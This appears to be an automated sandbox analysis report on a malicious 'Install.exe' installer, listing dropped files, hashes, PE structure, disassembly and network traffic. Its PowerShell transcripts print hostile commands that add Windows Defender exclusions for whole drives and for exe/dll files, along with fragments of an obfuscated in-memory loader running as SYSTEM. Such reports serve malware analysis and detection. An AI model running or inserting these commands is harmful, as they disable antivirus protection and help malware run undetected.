                          SHA-256:5F7D9A86D2E3083645825298C5A61B2EB54DA2F2DA13241ECA4602C03766123F
                          SHA-512:99194B41134E7D8C016A22F4556267CE9C512AF7E886F10A2E2F3E4CF6478CF5DEB239A07E8CEE2EA383FCDD222C62680EA9163BBE25C576296390688BC78441
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014217..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 5728..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014217..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):6063
                          Entropy (8bit):5.526751101211023
                          Encrypted:false
                          SSDEEP:96:BZisj4N2ctqDo1ZoQFZiFj4N2ctqDo1Zol3x1xvxjZirj4N2ctqDo1ZoHSx/x/xO:eGckvBckGzckpRD
                          MD5:3B10DF410A30476A570541A74E966B4E
                          SHA1:8834897CC7C20AD5C4C4B59A91B5535FB94B454A
                          SHA-256:4D3D10EC15EB5EB0E10AF8753F72EACE24DC29BA1D9B1638A7B1DD29C2EF8BC9
                          SHA-512:6D119BC9B7440EEFD9E2112530BAE3D038B6C698CFD12AAAB9FFA10EEDA1575BCE5BA56C395A930851F0498559C1CB576E871F14CBA37C79B716AB6C30A84A8A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014103..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA..Process ID: 7048..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014103..**********************..PS>Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force..**********************..Windows PowerShell transcript start..Sta
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5758
                          Entropy (8bit):5.5307589123834395
                          Encrypted:false
                          SSDEEP:96:BZiAj4N2AMvtqDo1ZojZiqj4N2AMvtqDo1ZoCgC4jZiqj4N2AMvtqDo1ZotBooSV:eqFk0IFkcIFk22y
                          MD5:7E8115E31EC613777C6FDFF8F88B6CF2
                          SHA1:253DBF54E6B578E26E71DC64D505DE9F62630062
                          SHA-256:4045DB0535FC2EF934E014E0C773D7E43CA50B077ED8536979F8CED459F1B608
                          SHA-512:5C6316219855F84FF2A3854F02035C1D55690AFA1286A93171565D10DBBDB1AC4F44E4A23CF4D7C455835CECBB7F8B749B98B31340C32B4CB26FFB23F87C82E7
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014129..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=..Process ID: 6856..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220327014129..**********************..PS>Add-MpPreference -ExclusionExtension @('exe','dll') -Force..**********************..Windows PowerShell transcript start..Start time: 20220327014354..Username: computer\user..Run
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                          Category:dropped
                          Size (bytes):5943
                          Entropy (8bit):5.8320176220731055
                          Encrypted:false
                          SSDEEP:96:BZiuN4NNv4GZig3yXM84p32aw0lFrc0lmrn0lmTeowqDo1Zoav4GZig3yXM84p3j:envVnIKjVQr0QBavVnIKjVQr0QPu3
                          MD5:4D218FEB27E8E5EDB4F59D0922AA32A2
                          SHA1:DF06E9EDE255262EF358472D0C2A9B2FA306664D
                          SHA-256:5E36C2D39F94189CCAD4AEE28C26042A699ACEE5BB8E3C23ACA4C9BF9F16D853
                          SHA-512:FC7599509D4679CEA32839E147EA6A718DF3B58450ACC69B6B43135DFDAF0034EC5810C87918A8FB74C51F6613D8A44AE944B9AB12611BA992A5B27561D99C7A
                          Malicious:false
                          Reputation:unknown
                          Preview:.**********************..Windows PowerShell transcript start..Start time: 20220327014145..Username: WORKGROUP\SYSTEM..RunAs User: WORKGROUP\SYSTEM..Configuration Name: ..Machine: 562258 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$j
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):9432
                          Entropy (8bit):4.926811811017033
                          Encrypted:false
                          SSDEEP:192:Gxoe5IpObxoe5lib4LVsm5emdJgkjDt4iWN3yBGHc9smgdcU6CkdcU6Cw9smqpOC:Xwib4L+kjh4iUxm44Qib4w
                          MD5:ADFF5BE0A9BB797ADEDC0B16C501A155
                          SHA1:ED842BE69739E3BF9082DE8FB0F7A596C22C0345
                          SHA-256:DADBB3611E60443C1F96672B3950A32B915D115EAA6FE8F6D8A57BED4067E3B0
                          SHA-512:9C6CA436FCE28572CD48D090C437881657F17B415A26F6C113A89755282D5D9BF46650B5C3C31FD890EC5C67CA0AB9A90A6F28B21B8315C25B506C6AC8EE600E
                          Malicious:false
                          Reputation:unknown
                          Preview:PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):1112
                          Entropy (8bit):5.248273118987016
                          Encrypted:false
                          SSDEEP:24:3lPpQrLAo4KAxX5qRPD42HOoFe9t4CvKuKnKyH+S:VPerB4nqRL/HvFe9t4Cv94nH+S
                          MD5:C89140BEA721DEBDA4F741B52939612A
                          SHA1:A353FE9D71C211A24EE7208F45CCC71170A65CD4
                          SHA-256:05E8082DAD4310F294CF069474C1DFA784427D69E87229D750FDA87C46B2D0B4
                          SHA-512:B134E10810FD68B0F50B143A08AFD88AA340CC54C561B09D559E23A77149AC31F26DFFC2FAAC5485247896CDB8535C0084EA2EDD815FB6E56F385F956D00DF27
                          Malicious:false
                          Reputation:unknown
                          Preview:@...e...........................................................8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.AutomationL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServices4................Zg5..:O..g..q..........System.Xml..4...............T..'Z..N..Nvj.G.........System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP................./.C..J..%...].......%.Microsoft.PowerShell.Commands.Utility...D..................-.D.F.<;.nt.1........System.Configuration.Ins
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5350
                          Entropy (8bit):3.907212050468804
                          Encrypted:false
                          SSDEEP:96:mgTVA1VwC9Hw1+Y3fmb2lpL+llpK3vbM+C4aWbga+vlLF5uOgA/wvpHJN/gAwIgA:3TVoVwC9HW/3+bq6hQM+CWbgaSLTu5A+
                          MD5:D6D553675A7B8F75130BDD8C7E3B7A7D
                          SHA1:EC8FE28936E9C0010B55180AD5A34439D1919EE3
                          SHA-256:523EAA769500D372D8DA8A2D77004F7F696865A174BB809B359792067822BE39
                          SHA-512:4DB377FD79B7B2218D824B04DF301209890D543C97A254A96AB28202890A23A7D68055EDF02592837377579ECD21F1055EC224F93B3C5CDF2D1295FD1B99A09F
                          Malicious:false
                          Reputation:unknown
                          Preview:......m....O.m....[F.......<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.o.B.Y.Z.x.p.o.B.u.J.D.g.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.h.C.P.A.J.C.D.c.A.n.F.q.J.q.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.N.i.b.V.x.W.x.T.F.c.).$.q.K.H.X.R.L.j.x.c.Q.b.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.
                          Process:C:\Windows\System32\nslookup.exe
                          File Type:data
                          Category:dropped
                          Size (bytes):5250
                          Entropy (8bit):3.8780212618682253
                          Encrypted:false
                          SSDEEP:96:hgTVwJV49Hw1+Y3Xb+pXpK9M+C4aWOtBmD9Z+vl9EF5oY5gAeNvpHYNiagABQnor:2TVwJV49HW/3XbGZ+M+CW6gDzSeToYu6
                          MD5:8743521E80CA300CB5D64D9129AC9B32
                          SHA1:02EC0C200E3CE2F12CA6EFAC516CFC0E72DA5AA2
                          SHA-256:B71335A7AF988047E29D0BDCE479EE8DD32351F03DE0A73D53D7D5C68E82A1F9
                          SHA-512:308CE10E6858A1BF1CDB67356CA719E5E9EB735B2D6DA85AB32F903F35C125BA7166FC5951C13EC05EA859BBD0234901CE3A99683AB2A7A3ECA6AA51FE128755
                          Malicious:false
                          Reputation:unknown
                          Preview:....2a.!..OB.if.t...F.P.....<... .....s.................................p.o.w.e.r.s.h.e.l.l.....".f.u.n.c.t.i.o.n. .L.o.c.a.l.:.J.c.V.E.S.t.Q.t.P.h.k.P.{.P.a.r.a.m.(.[.O.u.t.p.u.t.T.y.p.e.(.[.T.y.p.e.].).].[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.0.).].[.T.y.p.e.[.].].$.j.w.j.R.g.Z.F.z.a.e.Z.B.Q.B.,.[.P.a.r.a.m.e.t.e.r.(.P.o.s.i.t.i.o.n.=.1.).].[.T.y.p.e.].$.j.X.r.d.W.y.l.J.n.o.).$.J.k.E.T.j.F.s.A.c.r.F.=.[.A.p.p.D.o.m.a.i.n.].:.:.C.u.r.r.e.n.t.D.o.m.a.i.n...D.e.f.i.n.e.D.y.n.a.m.i.c.A.s.s.e.m.b.l.y.(.(.N.e.w.-.O.b.j.e.c.t. .R.e.f.l.e.c.t.i.o.n...A.s.s.e.m.b.l.y.N.a.m.e.(.'.R.e.f.l.e.c.t.e.d.D.e.l.e.g.a.t.e.'.).).,.[.R.e.f.l.e.c.t.i.o.n...E.m.i.t...A.s.s.e.m.b.l.y.B.u.i.l.d.e.r.A.c.c.e.s.s.].:.:.R.u.n.)...D.e.f.i.n.e.D.y.n.a.m.i.c.M.o.d.u.l.e.(.'.I.n.M.e.'.+.'.m.o.r.y.'.+.'.M.o.d.u.l.e.'.,.$.F.a.l.s.e.)...D.e.f.i.n.e.T.y.p.e.(.'.M.y.D.e.l.e.g.a.t.e.T.y.p.e.'.,.'.C.l.a.s.s.,.P.u.b.l.i.c.,.S.e.a.l.e.d.,.A.n.s.i.C.l.a.s.s.,.A.u.t.o.C.l.a.s.s.'.,.[.M.u.l.t.i.c.a.s.t.D.e.l.e.g.a.t.e.].).;.$.
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                          File Type:very short file (no magic)
                          Category:dropped
                          Size (bytes):1
                          Entropy (8bit):0.0
                          Encrypted:false
                          SSDEEP:3:U:U
                          MD5:C4CA4238A0B923820DCC509A6F75849B
                          SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                          SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                          SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                          Malicious:false
                          Reputation:unknown
                          Preview:1
                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                          Entropy (8bit):7.9968573054623615
                          TrID:
                          • Win32 Executable (generic) a (10002005/4) 99.96%
                          • Generic Win/DOS Executable (2004/3) 0.02%
                          • DOS Executable Generic (2002/1) 0.02%
                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                          File name:Install.exe
                          File size:4713759
                          MD5:280bfd5ea1f41586ea0ef60ee44bc8db
                          SHA1:57aa866f42bccbaceed938390001148323d033c1
                          SHA256:a6ca5523fce6a4a43964319c35ecb868186465309e9226ab07c158519a5ef6f9
                          SHA512:5c2bd96fd1bf0d3c3cfbca97666c9b20a6ae2ee651ad50739d30a24339b90c9f5261c9c5ea93004c4d048d892708a22802f615f5ac8a7464dc07a614366e0bd8
                          SSDEEP:98304:keFfhFS2DkSocOZKjg/sN0GkhVT8pxlxE7SSvsaTGN:keFfhxISoJZKs/DjV0xESmeN
                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L...Z.Oa.................j.........
                          Icon Hash:62f1d8ece6f37980
                          Entrypoint:0x40352d
                          Entrypoint Section:.text
                          Digitally signed:false
                          Imagebase:0x400000
                          Subsystem:windows gui
                          Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                          Time Stamp:0x614F9B5A [Sat Sep 25 21:57:46 2021 UTC]
                          TLS Callbacks:
                          CLR (.Net) Version:
                          OS Version Major:4
                          OS Version Minor:0
                          File Version Major:4
                          File Version Minor:0
                          Subsystem Version Major:4
                          Subsystem Version Minor:0
                          Import Hash:56a78d55f3f7af51443e58e0ce2fb5f6
                          Instruction
                          push ebp
                          mov ebp, esp
                          sub esp, 000003F4h
                          push ebx
                          push esi
                          push edi
                          push 00000020h
                          pop edi
                          xor ebx, ebx
                          push 00008001h
                          mov dword ptr [ebp-14h], ebx
                          mov dword ptr [ebp-04h], 0040A2E0h
                          mov dword ptr [ebp-10h], ebx
                          call dword ptr [004080CCh]
                          mov esi, dword ptr [004080D0h]
                          lea eax, dword ptr [ebp-00000140h]
                          push eax
                          mov dword ptr [ebp-0000012Ch], ebx
                          mov dword ptr [ebp-2Ch], ebx
                          mov dword ptr [ebp-28h], ebx
                          mov dword ptr [ebp-00000140h], 0000011Ch
                          call esi
                          test eax, eax
                          jne 00007FAAFC52011Ah
                          lea eax, dword ptr [ebp-00000140h]
                          mov dword ptr [ebp-00000140h], 00000114h
                          push eax
                          call esi
                          mov ax, word ptr [ebp-0000012Ch]
                          mov ecx, dword ptr [ebp-00000112h]
                          sub ax, 00000053h
                          add ecx, FFFFFFD0h
                          neg ax
                          sbb eax, eax
                          mov byte ptr [ebp-26h], 00000004h
                          not eax
                          and eax, ecx
                          mov word ptr [ebp-2Ch], ax
                          cmp dword ptr [ebp-0000013Ch], 0Ah
                          jnc 00007FAAFC5200EAh
                          and word ptr [ebp-00000132h], 0000h
                          mov eax, dword ptr [ebp-00000134h]
                          movzx ecx, byte ptr [ebp-00000138h]
                          mov dword ptr [00434FB8h], eax
                          xor eax, eax
                          mov ah, byte ptr [ebp-0000013Ch]
                          movzx eax, ax
                          or eax, ecx
                          xor ecx, ecx
                          mov ch, byte ptr [ebp-2Ch]
                          movzx ecx, cx
                          shl eax, 10h
                          or eax, ecx
                          Programming Language:
                          • [EXP] VC++ 6.0 SP5 build 8804
                           Name | Virtual Address | Virtual Size | Is in Section
                           IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8610 | 0xa0 | .rdata
                           IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x46000 | 0x42a8 | .rsrc
                           IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                           IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                           IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                          .text0x10000x68970x6a00False0.666126179245data6.45839821493IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                          .rdata0x80000x14a60x1600False0.439275568182data5.02410928126IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .data0xa0000x2b0180x600False0.521484375data4.15458210409IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                          .ndata0x360000x100000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          .rsrc0x460000x42a80x4400False0.294404871324data4.14140312698IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                          NameRVASizeTypeLanguageCountry
                          RT_ICON0x461f00x25a8dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x487980x10a8dBase IV DBT of @.DBF, block length 4096, next free block index 40, next free block 0, next used block 0EnglishUnited States
                          RT_ICON0x498400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                          RT_DIALOG0x49ca80x100dataEnglishUnited States
                          RT_DIALOG0x49da80x11cdataEnglishUnited States
                          RT_DIALOG0x49ec80x60dataEnglishUnited States
                          RT_GROUP_ICON0x49f280x30dataEnglishUnited States
                          RT_MANIFEST0x49f580x349XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States
                          DLLImport
                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW
                          Language of compilation systemCountry where language is spokenMap
                          EnglishUnited States
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.721342087 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.752830029 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.752959013 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.753820896 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:40:58.785864115 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:40:58.916342020 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:02.109366894 CET8049735208.95.112.1192.168.2.4
                          Mar 27, 2022 01:42:02.109472036 CET4973580192.168.2.4208.95.112.1
                          Mar 27, 2022 01:42:24.943854094 CET8049735208.95.112.1192.168.2.4
                          TimestampSource PortDest PortSource IPDest IP
                          Mar 27, 2022 01:40:58.679579973 CET6064753192.168.2.48.8.8.8
                          Mar 27, 2022 01:40:58.696609020 CET53606478.8.8.8192.168.2.4
                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
